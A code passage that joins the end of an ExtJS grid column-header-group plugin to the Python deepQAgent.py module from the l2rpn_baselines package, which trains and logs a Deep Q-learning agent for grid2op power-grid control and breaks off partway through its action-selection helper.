this.proxyTop.setLeftTop(px, data.r.top + this.proxyOffsets[1]);
this.proxyTop.show();
this.proxyBottom.setLeftTop(px, data.r.bottom);
this.proxyBottom.show();
return data.pt;
},
onNodeDrop: function(n, dd, e, data){
var h = data.header;
if(h != n){
var d = Ext.ux.grid.ColumnHeaderGroup.prototype.getDragDropData.call(this, h, n, e);
if(d === false){
return false;
}
var cm = this.grid.colModel, right = d.oldIndex < d.newIndex, rows = cm.rows;
for(var row = d.row, rlen = rows.length; row < rlen; row++){
var r = rows[row], len = r.length, fromIx = 0, span = 1, toIx = len;
for(var i = 0, gcol = 0; i < len; i++){
var group = r[i];
if(d.oldIndex >= gcol && d.oldIndex < gcol + group.colspan){
fromIx = i;
}
if(d.oldIndex + d.colspan - 1 >= gcol && d.oldIndex + d.colspan - 1 < gcol + group.colspan){
span = i - fromIx + 1;
}
if(d.newIndex >= gcol && d.newIndex < gcol + group.colspan){
toIx = i;
}
gcol += group.colspan;
}
var groups = r.splice(fromIx, span);
rows[row] = r.splice(0, toIx - (right ? span : 0)).concat(groups).concat(r);
}
for(var c = 0; c < d.colspan; c++){
var oldIx = d.oldIndex + (right ? 0 : c), newIx = d.newIndex + (right ? -1 : c);
cm.moveColumn(oldIx, newIx);
this.grid.fireEvent("columnmove", oldIx, newIx);
}
return true;
}
return false;
}
},
getGroupStyle: function(group, gcol){
var width = 0, hidden = true;
for(var i = gcol, len = gcol + group.colspan; i < len; i++){
if(!this.cm.isHidden(i)){
var cw = this.cm.getColumnWidth(i);
if(typeof cw == 'number'){
width += cw;
}
hidden = false;
}
}
return {
width: (Ext.isBorderBox || (Ext.isWebKit && !Ext.isSafari2) ? width : Math.max(width - this.borderWidth, 0)) + 'px',
hidden: hidden
};
},
updateGroupStyles: function(col){
var tables = this.mainHd.query('.x-grid3-header-offset > table'), tw = this.getTotalWidth(), rows = this.cm.rows;
for(var row = 0; row < tables.length; row++){
tables[row].style.width = tw;
if(row < rows.length){
var cells = tables[row].firstChild.firstChild.childNodes;
for(var i = 0, gcol = 0; i < cells.length; i++){
var group = rows[row][i];
if((typeof col != 'number') || (col >= gcol && col < gcol + group.colspan)){
var gs = Ext.ux.grid.ColumnHeaderGroup.prototype.getGroupStyle.call(this, group, gcol);
cells[i].style.width = gs.width;
cells[i].style.display = gs.hidden ? 'none' : '';
}
gcol += group.colspan;
}
}
}
},
getGroupRowIndex: function(el){
if(el){
var m = el.className.match(this.hrowRe);
if(m && m[1]){
return parseInt(m[1], 10);
}
}
return this.cm.rows.length;
},
getGroupSpan: function(row, col){
if(row < 0){
return {
col: 0,
colspan: this.cm.getColumnCount()
};
}
var r = this.cm.rows[row];
if(r){
for(var i = 0, gcol = 0, len = r.length; i < len; i++){
var group = r[i];
if(col >= gcol && col < gcol + group.colspan){
return {
col: gcol,
colspan: group.colspan
};
}
gcol += group.colspan;
}
return {
col: gcol,
colspan: 0
};
}
return {
col: col,
colspan: 1
};
},
getDragDropData: function(h, n, e){
if(h.parentNode != n.parentNode){
return false;
}
var cm = this.grid.colModel, x = Ext.lib.Event.getPageX(e), r = Ext.lib.Dom.getRegion(n.firstChild), px, pt;
if((r.right - x) <= (r.right - r.left) / 2){
px = r.right + this.view.borderWidth;
pt = "after";
}else{
px = r.left;
pt = "before";
}
var oldIndex = this.view.getCellIndex(h), newIndex = this.view.getCellIndex(n);
if(cm.isFixed(newIndex)){
return false;
}
var row = Ext.ux.grid.ColumnHeaderGroup.prototype.getGroupRowIndex.call(this.view, h),
oldGroup = Ext.ux.grid.ColumnHeaderGroup.prototype.getGroupSpan.call(this.view, row, oldIndex),
newGroup = Ext.ux.grid.ColumnHeaderGroup.prototype.getGroupSpan.call(this.view, row, newIndex),
oldIndex = oldGroup.col;
newIndex = newGroup.col + (pt == "after" ? newGroup.colspan : 0);
if(newIndex >= oldGroup.col && newIndex <= oldGroup.col + oldGroup.colspan){
return false;
}
var parentGroup = Ext.ux.grid.ColumnHeaderGroup.prototype.getGroupSpan.call(this.view, row - 1, oldIndex);
if(newIndex < parentGroup.col || newIndex > parentGroup.col + parentGroup.colspan){
return false;
}
return {
r: r,
px: px,
pt: pt,
row: row,
oldIndex: oldIndex,
newIndex: newIndex,
colspan: oldGroup.colspan
};
}
}); | PypiClean |
/l2rpn_baselines-0.8.0.tar.gz/l2rpn_baselines-0.8.0/l2rpn_baselines/utils/deepQAgent.py |
import os
import warnings
import numpy as np
from tqdm import tqdm
from grid2op.Exceptions import Grid2OpException
from grid2op.Agent import AgentWithConverter
from grid2op.Converter import IdToAct
from l2rpn_baselines.utils.replayBuffer import ReplayBuffer
from l2rpn_baselines.utils.trainingParam import TrainingParam
try:
from grid2op.Chronics import MultifolderWithCache
_CACHE_AVAILABLE_DEEPQAGENT = True
except ImportError:
_CACHE_AVAILABLE_DEEPQAGENT = False
try:
import tensorflow as tf
_CAN_USE_TENSORFLOW = True
except ImportError:
_CAN_USE_TENSORFLOW = False
class DeepQAgent(AgentWithConverter):
"""
    This class allows to train and log the training of different Q learning algorithms.
    .. warning::
        This baseline recodes the entire RL training procedure. You can use it if you
        want to have a deeper look at the Deep Q Learning algorithm and a possible (non
        optimized, slow, etc.) implementation.
        For a much better implementation, you can reuse the code of the "PPO_RLLIB"
        or the "PPO_SB3" baseline.
        Prefer to use the :class:`GymAgent` class and the :class:`GymEnvWithHeuristics`
        classes to train agents interacting with grid2op and fully compatible
        with the gym framework.
    It is not meant to be the state of the art implementation of some baseline. It is rather meant to be a set of
    useful functions that allows to easily develop an agent if you want to get started in RL using grid2op.
It derives from :class:`grid2op.Agent.AgentWithConverter` and as such implements the :func:`DeepQAgent.convert_obs`
and :func:`DeepQAgent.my_act`
    It is supposed to be a Baseline, so it also implements the
- :func:`DeepQAgent.load`: to load the agent
- :func:`DeepQAgent.save`: to save the agent
- :func:`DeepQAgent.train`: to train the agent
TODO description of the training scheme!
Attributes
----------
filter_action_fun: ``callable``
The function used to filter the action of the action space. See the documentation of grid2op:
:class:`grid2op.Converter.IdToAct`
`here <https://grid2op.readthedocs.io/en/v0.9.3/converter.html#grid2op.Converter.IdToAct>`_ for more
information.
replay_buffer:
The experience replay buffer
deep_q: :class:`BaseDeepQ`
The neural network, represented as a :class:`BaseDeepQ` object.
name: ``str``
The name of the Agent
store_action: ``bool``
        Whether you want to register which action your agent took or not. Saving the actions can slow down
        the computation a bit (less than 1%) but can help understand what your agent is doing during its learning process.
    dict_action: ``dict``
        The actions taken by the agent, represented as a dictionary. This can be useful to know which types of actions
        are taken by your agent. Only filled if :attr:`DeepQAgent.store_action` is ``True``
istraining: ``bool``
        Whether you are training this agent or not. No longer really used; mainly kept for backward compatibility.
epsilon: ``float``
The epsilon greedy exploration parameter.
nb_injection: ``int``
Number of action tagged as "injection". See the
`official grid2op documentation <https://grid2op.readthedocs.io/en/v0.9.3/action.html?highlight=get_types#grid2op.Action.BaseAction.get_types>`_
for more information.
nb_voltage: ``int``
Number of action tagged as "voltage". See the
`official grid2op documentation <https://grid2op.readthedocs.io/en/v0.9.3/action.html?highlight=get_types#grid2op.Action.BaseAction.get_types>`_
for more information.
nb_topology: ``int``
Number of action tagged as "topology". See the
`official grid2op documentation <https://grid2op.readthedocs.io/en/v0.9.3/action.html?highlight=get_types#grid2op.Action.BaseAction.get_types>`_
for more information.
nb_redispatching: ``int``
Number of action tagged as "redispatching". See the
`official grid2op documentation <https://grid2op.readthedocs.io/en/v0.9.3/action.html?highlight=get_types#grid2op.Action.BaseAction.get_types>`_
for more information.
nb_storage: ``int``
Number of action tagged as "storage". See the
`official grid2op documentation <https://grid2op.readthedocs.io/en/v0.9.3/action.html?highlight=get_types#grid2op.Action.BaseAction.get_types>`_
for more information.
nb_curtail: ``int``
Number of action tagged as "curtailment". See the
`official grid2op documentation <https://grid2op.readthedocs.io/en/v0.9.3/action.html?highlight=get_types#grid2op.Action.BaseAction.get_types>`_
for more information.
nb_do_nothing: ``int``
Number of action tagged as "do_nothing", *ie* when an action is not modifiying the state of the grid. See the
`official grid2op documentation <https://grid2op.readthedocs.io/en/v0.9.3/action.html?highlight=get_types#grid2op.Action.BaseAction.get_types>`_
for more information.
verbose: ``bool``
        An effort will be made on the logging (outside of tensorboard) of the training. For now: verbose=True will
allow some printing on the command prompt, and verbose=False will drastically reduce the amount of information
printed during training.
"""
def __init__(self,
action_space,
nn_archi,
name="DeepQAgent",
store_action=True,
istraining=False,
filter_action_fun=None,
verbose=False,
observation_space=None,
**kwargs_converters):
if not _CAN_USE_TENSORFLOW:
raise RuntimeError("Cannot import tensorflow, this function cannot be used.")
AgentWithConverter.__init__(self, action_space, action_space_converter=IdToAct, **kwargs_converters)
self.filter_action_fun = filter_action_fun
if self.filter_action_fun is not None:
self.action_space.filter_action(self.filter_action_fun)
# and now back to the origin implementation
self.replay_buffer = None
self.__nb_env = None
self.deep_q = None
self._training_param = None
self._tf_writer = None
self.name = name
self._losses = None
self.__graph_saved = False
self.store_action = store_action
self.dict_action = {}
self.istraining = istraining
self.epsilon = 1.0
# for tensorbaord
self._train_lr = None
self._reset_num = None
self._max_iter_env_ = 1000000
self._curr_iter_env = 0
self._max_reward = 0.
# action type
self.nb_injection = 0
self.nb_voltage = 0
self.nb_topology = 0
self.nb_line = 0
self.nb_redispatching = 0
self.nb_curtail = 0
self.nb_storage = 0
self.nb_do_nothing = 0
# for over sampling the hard scenarios
self._prev_obs_num = 0
self._time_step_lived = None
self._nb_chosen = None
self._proba = None
self._prev_id = 0
# this is for the "limit the episode length" depending on your previous success
self._total_sucesses = 0
# neural network architecture
self._nn_archi = nn_archi
# observation tranformers
self._obs_as_vect = None
self._tmp_obs = None
self._indx_obs = None
self.verbose = verbose
if observation_space is None:
pass
else:
self.init_obs_extraction(observation_space)
# for the frequency of action type
self.current_ = 0
self.nb_ = 10
self._nb_this_time = np.zeros((self.nb_, 8), dtype=int)
#
self._vector_size = None
self._actions_per_ksteps = None
self._illegal_actions_per_ksteps = None
self._ambiguous_actions_per_ksteps = None
def _fill_vectors(self, training_param):
self._vector_size = self.nb_ * training_param.update_tensorboard_freq
self._actions_per_ksteps = np.zeros((self._vector_size, self.action_space.size()), dtype=np.int)
self._illegal_actions_per_ksteps = np.zeros(self._vector_size, dtype=np.int)
self._ambiguous_actions_per_ksteps = np.zeros(self._vector_size, dtype=np.int)
# grid2op.Agent interface
def convert_obs(self, observation):
"""
        Generic way to convert an observation. This transforms it to a vector and then selects the attributes that were
selected in :attr:`l2rpn_baselines.utils.NNParams.list_attr_obs` (that have been extracted once and for all
in the :attr:`DeepQAgent._indx_obs` vector).
Parameters
----------
observation: :class:`grid2op.Observation.BaseObservation`
The current observation sent by the environment
Returns
-------
_tmp_obs: ``numpy.ndarray``
            The observation as a vector with only the proper attributes selected (TODO: scaling will be available
            in a future version)
"""
obs_as_vect = observation.to_vect()
self._tmp_obs[:] = obs_as_vect[self._indx_obs]
return self._tmp_obs
def my_act(self, transformed_observation, reward, done=False):
"""
This function will return the action (its id) selected by the underlying :attr:`DeepQAgent.deep_q` network.
        Before being used, this method requires that the :attr:`DeepQAgent.deep_q` is created. To that end a call
to :func:`DeepQAgent.init_deep_q` needs to have been performed (this is automatically done if you use
baseline we provide and their `evaluate` and `train` scripts).
Parameters
----------
transformed_observation: ``numpy.ndarray``
The observation, as transformed after :func:`DeepQAgent.convert_obs`
reward: ``float``
The reward of the last time step. Ignored by this method. Here for retro compatibility with openAI
gym interface.
done: ``bool``
Whether the episode is over or not. This is not used, and is only present to be compliant with
open AI gym interface
Returns
-------
res: ``int``
            The id of the action taken.
"""
predict_movement_int, *_ = self.deep_q.predict_movement(transformed_observation,
epsilon=0.0,
training=False)
res = int(predict_movement_int)
self._store_action_played(res)
return res
@staticmethod
def get_action_size(action_space, filter_fun, kwargs_converters):
"""
        This function allows to get the size of the action space if we were to build a :class:`DeepQAgent`
        with these parameters.
Parameters
----------
action_space: :class:`grid2op.ActionSpace`
The grid2op action space used.
filter_fun: ``callable``
see :attr:`DeepQAgent.filter_fun` for more information
kwargs_converters: ``dict``
see the documentation of grid2op for more information:
`here <https://grid2op.readthedocs.io/en/v0.9.3/converter.html?highlight=idToAct#grid2op.Converter.IdToAct.init_converter>`_
See Also
--------
The official documentation of grid2Op, and especially its class "IdToAct" at this address
`IdToAct <https://grid2op.readthedocs.io/en/v0.9.3/converter.html?highlight=idToAct#grid2op.Converter.IdToAct>`_
"""
converter = IdToAct(action_space)
converter.init_converter(**kwargs_converters)
if filter_fun is not None:
converter.filter_action(filter_fun)
return converter.n
def init_obs_extraction(self, observation_space):
"""
        This method should be called to initialize the observation (fed as a vector to the neural network)
from its description as a list of its attribute names.
"""
        tmp = np.zeros(0, dtype=np.uint)  # TODO platform independent
for obs_attr_name in self._nn_archi.get_obs_attr():
beg_, end_, dtype_ = observation_space.get_indx_extract(obs_attr_name)
tmp = np.concatenate((tmp, np.arange(beg_, end_, dtype=np.uint)))
self._indx_obs = tmp
self._tmp_obs = np.zeros((1, tmp.shape[0]), dtype=np.float32)
# baseline interface
def load(self, path):
"""
Part of the l2rpn_baselines interface, this function allows to read back a trained model, to continue the
training or to evaluate its performance for example.
**NB** To reload an agent, it must have exactly the same name and have been saved at the right location.
Parameters
----------
path: ``str``
            The path where the agent has previously been saved.
"""
        # not modified compared to the original implementation
tmp_me = os.path.join(path, self.name)
if not os.path.exists(tmp_me):
raise RuntimeError("The model should be stored in \"{}\". But this appears to be empty".format(tmp_me))
self._load_action_space(tmp_me)
        # TODO handle case where training param class has been overridden
self._training_param = TrainingParam.from_json(os.path.join(tmp_me, "training_params.json".format(self.name)))
self.deep_q = self._nn_archi.make_nn(self._training_param)
try:
self.deep_q.load_network(tmp_me, name=self.name)
except Exception as e:
raise RuntimeError("Impossible to load the model located at \"{}\" with error \n{}".format(path, e))
for nm_attr in ["_time_step_lived", "_nb_chosen", "_proba"]:
conv_path = os.path.join(tmp_me, "{}.npy".format(nm_attr))
if os.path.exists(conv_path):
setattr(self, nm_attr, np.load(file=conv_path))
def save(self, path):
"""
Part of the l2rpn_baselines interface, this allows to save a model. Its name is used at saving time. The
same name must be reused when loading it back.
Parameters
----------
path: ``str``
The path where to save the agent.
"""
if path is not None:
tmp_me = os.path.join(path, self.name)
if not os.path.exists(tmp_me):
os.mkdir(tmp_me)
nm_conv = "action_space.npy"
conv_path = os.path.join(tmp_me, nm_conv)
if not os.path.exists(conv_path):
self.action_space.save(path=tmp_me, name=nm_conv)
self._training_param.save_as_json(tmp_me, name="training_params.json")
self._nn_archi.save_as_json(tmp_me, "nn_architecture.json")
self.deep_q.save_network(tmp_me, name=self.name)
# TODO save the "oversampling" part, and all the other info
for nm_attr in ["_time_step_lived", "_nb_chosen", "_proba"]:
conv_path = os.path.join(tmp_me, "{}.npy".format(nm_attr))
attr_ = getattr(self, nm_attr)
if attr_ is not None:
np.save(arr=attr_, file=conv_path)
def train(self,
env,
iterations,
save_path,
logdir,
training_param=None):
"""
Part of the public l2rpn-baselines interface, this function allows to train the baseline.
        If `save_path` is not None, the model is saved regularly, and also at the end of training.
TODO explain a bit more how you can train it.
Parameters
----------
env: :class:`grid2op.Environment.Environment` or :class:`grid2op.Environment.MultiEnvironment`
The environment used to train your model.
iterations: ``int``
            The number of training iterations. NB when reloading a model, this is **NOT** the number of training steps that will
            be used when re-training. Indeed, if `iterations` is 1000 and the model was already trained for 750 time
steps, then when reloaded, the training will occur on 250 (=1000 - 750) time steps only.
save_path: ``str``
Location at which to save the model
logdir: ``str``
Location at which tensorboard related information will be kept.
training_param: :class:`l2rpn_baselines.utils.TrainingParam`
The meta parameters for the training procedure. This is currently ignored if the model is reloaded (in that
case the parameters used when first created will be used)
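        Examples
        --------
        A rough sketch only: ``my_nn_archi`` stands for the network architecture description
        expected by the constructor (the ``nn_archi`` argument) and is not built here, and the
        environment name is just an example.
        .. code-block:: python
            import grid2op
            from l2rpn_baselines.utils.trainingParam import TrainingParam
            env = grid2op.make("l2rpn_case14_sandbox")
            agent = DeepQAgent(env.action_space,
                               nn_archi=my_nn_archi,
                               name="DeepQAgent",
                               istraining=True,
                               observation_space=env.observation_space)
            agent.train(env,
                        iterations=10000,
                        save_path="./saved_model",
                        logdir="./tf_logs",
                        training_param=TrainingParam())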
"""
if training_param is None:
training_param = TrainingParam()
self._train_lr = training_param.lr
if self._training_param is None:
self._training_param = training_param
else:
training_param = self._training_param
self._init_deep_q(self._training_param, env)
self._fill_vectors(self._training_param)
self._init_replay_buffer()
        # efficient reading of the data (read them by chunks of roughly 1 day)
nb_ts_one_day = 24 * 60 / 5 # number of time steps per day
self._set_chunk(env, nb_ts_one_day)
# Create file system related vars
if save_path is not None:
save_path = os.path.abspath(save_path)
os.makedirs(save_path, exist_ok=True)
if logdir is not None:
logpath = os.path.join(logdir, self.name)
self._tf_writer = tf.summary.create_file_writer(logpath, name=self.name)
else:
logpath = None
self._tf_writer = None
UPDATE_FREQ = training_param.update_tensorboard_freq # update tensorboard every "UPDATE_FREQ" steps
SAVING_NUM = training_param.save_model_each
if hasattr(env, "nb_env"):
nb_env = env.nb_env
warnings.warn("Training using {} environments".format(nb_env))
self.__nb_env = nb_env
else:
self.__nb_env = 1
# if isinstance(env, grid2op.Environment.Environment):
# self.__nb_env = 1
# else:
# import warnings
# nb_env = env.nb_env
# warnings.warn("Training using {} environments".format(nb_env))
# self.__nb_env = nb_env
self.init_obs_extraction(env.observation_space)
training_step = self._training_param.last_step
        # some parameters have been moved to a class named "training_param" for convenience
self.epsilon = self._training_param.initial_epsilon
        # now the number of alive frames and total reward depend on the "underlying environment". They are vectors
        # instead of scalars
alive_frame, total_reward = self._init_global_train_loop()
reward, done = self._init_local_train_loop()
epoch_num = 0
self._losses = np.zeros(iterations)
alive_frames = np.zeros(iterations)
total_rewards = np.zeros(iterations)
new_state = None
self._reset_num = 0
self._curr_iter_env = 0
self._max_reward = env.reward_range[1]
# action types
# injection, voltage, topology, line, redispatching = action.get_types()
self.nb_injection = 0
self.nb_voltage = 0
self.nb_topology = 0
self.nb_line = 0
self.nb_redispatching = 0
self.nb_curtail = 0
self.nb_storage = 0
self.nb_do_nothing = 0
# for non uniform random sampling of the scenarios
th_size = None
self._prev_obs_num = 0
if self.__nb_env == 1:
# TODO make this available for multi env too
if _CACHE_AVAILABLE_DEEPQAGENT:
if isinstance(env.chronics_handler.real_data, MultifolderWithCache):
th_size = env.chronics_handler.real_data.cache_size
if th_size is None:
th_size = len(env.chronics_handler.real_data.subpaths)
# number of time step lived per possible scenarios
if self._time_step_lived is None or self._time_step_lived.shape[0] != th_size:
self._time_step_lived = np.zeros(th_size, dtype=np.uint64)
# number of time a given scenario has been played
if self._nb_chosen is None or self._nb_chosen.shape[0] != th_size:
self._nb_chosen = np.zeros(th_size, dtype=np.uint)
# number of time a given scenario has been played
if self._proba is None or self._proba.shape[0] != th_size:
self._proba = np.ones(th_size, dtype=np.float64)
self._prev_id = 0
# this is for the "limit the episode length" depending on your previous success
self._total_sucesses = 0
with tqdm(total=iterations - training_step, disable=not self.verbose) as pbar:
while training_step < iterations:
# reset or build the environment
initial_state = self._need_reset(env, training_step, epoch_num, done, new_state)
# Slowly decay the exploration parameter epsilon
# if self.epsilon > training_param.FINAL_EPSILON:
self.epsilon = self._training_param.get_next_epsilon(current_step=training_step)
# then we need to predict the next moves. Agents have been adapted to predict a batch of data
pm_i, pq_v, act = self._next_move(initial_state, self.epsilon, training_step)
# todo store the illegal / ambiguous / ... actions
reward, done = self._init_local_train_loop()
if self.__nb_env == 1:
# still the "hack" to have same interface between multi env and env...
# yeah it's a pain
act = act[0]
temp_observation_obj, temp_reward, temp_done, info = env.step(act)
if self.__nb_env == 1:
# dirty hack to wrap them into list
temp_observation_obj = [temp_observation_obj]
temp_reward = np.array([temp_reward], dtype=np.float32)
temp_done = np.array([temp_done], dtype=np.bool)
info = [info]
new_state = self._convert_obs_train(temp_observation_obj)
self._updage_illegal_ambiguous(training_step, info)
done, reward, total_reward, alive_frame, epoch_num \
= self._update_loop(done, temp_reward, temp_done, alive_frame, total_reward, reward, epoch_num)
# update the replay buffer
self._store_new_state(initial_state, pm_i, reward, done, new_state)
# now train the model
if not self._train_model(training_step):
# infinite loss in this case
raise RuntimeError("ERROR INFINITE LOSS")
# Save the network every 1000 iterations
if training_step % SAVING_NUM == 0 or training_step == iterations - 1:
self.save(save_path)
# save some information to tensorboard
alive_frames[epoch_num] = np.mean(alive_frame)
total_rewards[epoch_num] = np.mean(total_reward)
self._store_action_played_train(training_step, pm_i)
self._save_tensorboard(training_step, epoch_num, UPDATE_FREQ, total_rewards, alive_frames)
training_step += 1
pbar.update(1)
self.save(save_path)
# auxiliary functions
    # the two functions below: to train with multiple environments
def _convert_obs_train(self, observations):
""" create the observations that are used for training."""
if self._obs_as_vect is None:
size_obs = self.convert_obs(observations[0]).shape[1]
self._obs_as_vect = np.zeros((self.__nb_env, size_obs), dtype=np.float32)
for i, obs in enumerate(observations):
self._obs_as_vect[i, :] = self.convert_obs(obs).reshape(-1)
return self._obs_as_vect
def _create_action_if_not_registered(self, action_int):
"""make sure that `action_int` is present in dict_action"""
if action_int not in self.dict_action:
act = self.action_space.all_actions[action_int]
is_inj, is_volt, is_topo, is_line_status, is_redisp, is_storage, is_dn, is_curtail = \
False, False, False, False, False, False, False, False
try:
                # feature unavailable in grid2op <= 0.9.2
try:
# storage introduced in grid2op 1.5.0 so if below it is not supported
is_inj, is_volt, is_topo, is_line_status, is_redisp = act.get_types()
except ValueError as exc_:
try:
is_inj, is_volt, is_topo, is_line_status, is_redisp, is_storage = act.get_types()
except ValueError as exc_:
is_inj, is_volt, is_topo, is_line_status, is_redisp, is_storage, is_curtail = act.get_types()
is_dn = (not is_inj) and (not is_volt) and (not is_topo) and (not is_line_status) and (not is_redisp)
is_dn = is_dn and (not is_storage)
is_dn = is_dn and (not is_curtail)
except Exception as exc_:
pass
self.dict_action[action_int] = [0, act,
(is_inj, is_volt, is_topo, is_line_status, is_redisp, is_storage, is_curtail, is_dn)]
def _store_action_played(self, action_int):
"""if activated, this function will store the action taken by the agent."""
if self.store_action:
self._create_action_if_not_registered(action_int)
self.dict_action[action_int][0] += 1
(is_inj, is_volt, is_topo, is_line_status, is_redisp, is_storage, is_curtail, is_dn) = self.dict_action[action_int][2]
if is_inj:
self.nb_injection += 1
if is_volt:
self.nb_voltage += 1
if is_topo:
self.nb_topology += 1
if is_line_status:
self.nb_line += 1
if is_redisp:
self.nb_redispatching += 1
if is_storage:
self.nb_storage += 1
self.nb_redispatching += 1
if is_curtail:
self.nb_curtail += 1
if is_dn:
self.nb_do_nothing += 1
def _convert_all_act(self, act_as_integer):
"""this function converts the action given as a list of integer. It ouputs a list of valid grid2op Action"""
res = []
for act_id in act_as_integer:
res.append(self.convert_act(act_id))
self._store_action_played(act_id)
return res
def _load_action_space(self, path):
""" load the action space in case the model is reloaded"""
if not os.path.exists(path):
raise RuntimeError("The model should be stored in \"{}\". But this appears to be empty".format(path))
try:
self.action_space.init_converter(
all_actions=os.path.join(path, "action_space.npy".format(self.name)))
except Exception as e:
raise RuntimeError("Impossible to reload converter action space with error \n{}".format(e))
# utilities for data reading
def _set_chunk(self, env, nb):
"""
to optimize the data reading process. See the official grid2op documentation for the effect of setting
the chunk size for the environment.
"""
env.set_chunk_size(int(max(100, nb)))
def _train_model(self, training_step):
"""train the deep q networks."""
self._training_param.tell_step(training_step)
if training_step > max(self._training_param.min_observation, self._training_param.minibatch_size) and \
self._training_param.do_train():
# train the model
s_batch, a_batch, r_batch, d_batch, s2_batch = self.replay_buffer.sample(self._training_param.minibatch_size)
tf_writer = None
if self.__graph_saved is False:
tf_writer = self._tf_writer
loss = self.deep_q.train(s_batch, a_batch, r_batch, d_batch, s2_batch,
tf_writer)
# save learning rate for later
if hasattr(self.deep_q._optimizer_model, "_decayed_lr"):
self.train_lr = self.deep_q._optimizer_model._decayed_lr('float32').numpy()
else:
self.train_lr = self.deep_q._optimizer_model.learning_rate.numpy()
self.__graph_saved = True
if not np.all(np.isfinite(loss)):
# if the loss is not finite we stop the learning
return False
self.deep_q.target_train()
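# note (descriptive comment): `target_train` refreshes the target network from the
# online network (typically a full or soft copy of the weights), which keeps the
# bootstrapped Q-value targets stable between updates.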
self._losses[training_step:] = np.sum(loss)
return True
def _updage_illegal_ambiguous(self, curr_step, info):
"""update the conunt of illegal and ambiguous actions"""
tmp_ = curr_step % self._vector_size
self._illegal_actions_per_ksteps[tmp_] = np.sum([el["is_illegal"] for el in info])
self._ambiguous_actions_per_ksteps[tmp_] = np.sum([el["is_ambiguous"] for el in info])
def _store_action_played_train(self, training_step, action_id):
"""store which action were played, for tensorboard only."""
which_row = training_step % self._vector_size
self._actions_per_ksteps[which_row, :] = 0
self._actions_per_ksteps[which_row, action_id] += 1
def _fast_forward_env(self, env, time=7*24*60/5):
"""use this functio to skip some time steps when environment is reset."""
my_int = np.random.randint(0, min(time, env.chronics_handler.max_timestep()))
env.fast_forward_chronics(my_int)
def _reset_env_clean_state(self, env):
"""
reset this environment to a proper state. This should rather be integrated in grid2op. And will probably
be integrated partially starting from grid2op 1.0.0
"""
# /!\ DO NOT ATTEMPT TO MODIFY OTHERWISE IT WILL PROBABLY CRASH /!\
# /!\ THIS WILL BE PART OF THE ENVIRONMENT IN FUTURE GRID2OP RELEASE (>= 1.0.0) /!\
# AND OF COURSE USING THIS METHOD DURING THE EVALUATION IS COMPLETELY FORBIDDEN
if self.__nb_env > 1:
return
env.current_obs = None
env.env_modification = None
env._reset_maintenance()
env._reset_redispatching()
env._reset_vectors_and_timings()
_backend_action = env._backend_action_class()
_backend_action.all_changed()
env._backend_action = _backend_action
env.backend.apply_action(_backend_action)
_backend_action.reset()
*_, fail_to_start, info = env.step(env.action_space())
if fail_to_start:
# this is happening because not enough care has been taken to handle these problems
# more care will be taken when this feature will be available in grid2op directly.
raise Grid2OpException("Impossible to initialize the powergrid, the powerflow diverge at iteration 0. "
"Available information are: {}".format(info))
env._reset_vectors_and_timings()
def _need_reset(self, env, observation_num, epoch_num, done, new_state):
"""perform the proper reset of the environment"""
if self._training_param.step_increase_nb_iter is not None and \
self._training_param.step_increase_nb_iter > 0:
self._max_iter_env(min(max(self._training_param.min_iter,
self._training_param.max_iter_fun(self._total_sucesses)),
self._training_param.max_iter)) # TODO
self._curr_iter_env += 1
if new_state is None:
# it's the first ever loop
obs = env.reset()
if self.__nb_env == 1:
# still the hack to have the same interface between multi env and single env
obs = [obs]
new_state = self._convert_obs_train(obs)
elif self.__nb_env > 1:
# in multi env this is automatically handled
pass
elif done[0]:
nb_ts_one_day = 24*60/5
if False:
# the 3-4 lines below allow to reuse the already loaded dataset and to continue further in time in the same chronics instead of reloading everything from scratch
try:
self._reset_env_clean_state(env)
# random fast forward between now and next day
self._fast_forward_env(env, time=nb_ts_one_day)
except (StopIteration, Grid2OpException):
env.reset()
# random fast forward between now and next week
self._fast_forward_env(env, time=7*nb_ts_one_day)
# update the number of time steps it has live
ts_lived = observation_num - self._prev_obs_num
if self._time_step_lived is not None:
self._time_step_lived[self._prev_id] += ts_lived
self._prev_obs_num = observation_num
if self._training_param.oversampling_rate is not None:
# proba = np.sqrt(1. / (self._time_step_lived +1))
# # over sampling some kind of "UCB like" stuff
# # https://banditalgs.com/2016/09/18/the-upper-confidence-bound-algorithm/
# proba = 1. / (self._time_step_lived + 1)
self._proba[:] = 1. / (self._time_step_lived ** self._training_param.oversampling_rate + 1)
self._proba /= np.sum(self._proba)
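# note (descriptive comment): each chronic is sampled with probability roughly inversely
# proportional to the number of time steps already survived on it (raised to
# `oversampling_rate`), so scenarios on which the agent fails early are replayed more often.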
_prev_id = self._prev_id
self._prev_id = None
if _CACHE_AVAILABLE_DEEPQAGENT:
if isinstance(env.chronics_handler.real_data, MultifolderWithCache):
self._prev_id = env.chronics_handler.real_data.sample_next_chronics(self._proba)
if self._prev_id is None:
self._prev_id = _prev_id + 1
self._prev_id %= self._time_step_lived.shape[0]
obs = self._reset_env(env, epoch_num)
if self._training_param.sample_one_random_action_begin is not None and \
observation_num < self._training_param.sample_one_random_action_begin:
done = True
while done:
act = env.action_space(env.action_space._sample_set_bus())
obs, reward, done, info = env.step(act)
if info["is_illegal"] or info["is_ambiguous"]:
# there is no guarantee that sampled actions are legal or perfectly
# correct.
# if that is the case, i "simply" restart the process, as if the action
# broke everything
done = True
if done:
obs = self._reset_env(env, epoch_num)
else:
if self.verbose:
print("step {}: {}".format(observation_num, act))
obs = [obs] # for compatibility with multi env...
new_state = self._convert_obs_train(obs)
return new_state
def _reset_env(self, env, epoch_num):
env.reset()
if self._nb_chosen is not None:
self._nb_chosen[self._prev_id] += 1
# random fast forward between now and next week
if self._training_param.random_sample_datetime_start is not None:
self._fast_forward_env(env, time=self._training_param.random_sample_datetime_start)
self._curr_iter_env = 0
obs = [env.current_obs]
if epoch_num % len(env.chronics_handler.real_data.subpaths) == 0:
# re shuffle the data
env.chronics_handler.shuffle(lambda x: x[np.random.choice(len(x), size=len(x), replace=False)])
return obs
def _init_replay_buffer(self):
"""create and initialized the replay buffer"""
self.replay_buffer = ReplayBuffer(self._training_param.buffer_size)
def _store_new_state(self, initial_state, predict_movement_int, reward, done, new_state):
"""store the new state in the replay buffer"""
# vectorized version of the previous code
for i_s, pm_i, reward, done, ns in zip(initial_state, predict_movement_int, reward, done, new_state):
self.replay_buffer.add(i_s,
pm_i,
reward,
done,
ns)
def _max_iter_env(self, new_max_iter):
"""update the number of maximum iteration allowed."""
self._max_iter_env_ = new_max_iter
def _next_move(self, curr_state, epsilon, training_step):
# supposes that 0 encodes for do nothing, otherwise it will NOT work (for the observer)
pm_i, pq_v, q_actions = self.deep_q.predict_movement(curr_state, epsilon, training=True)
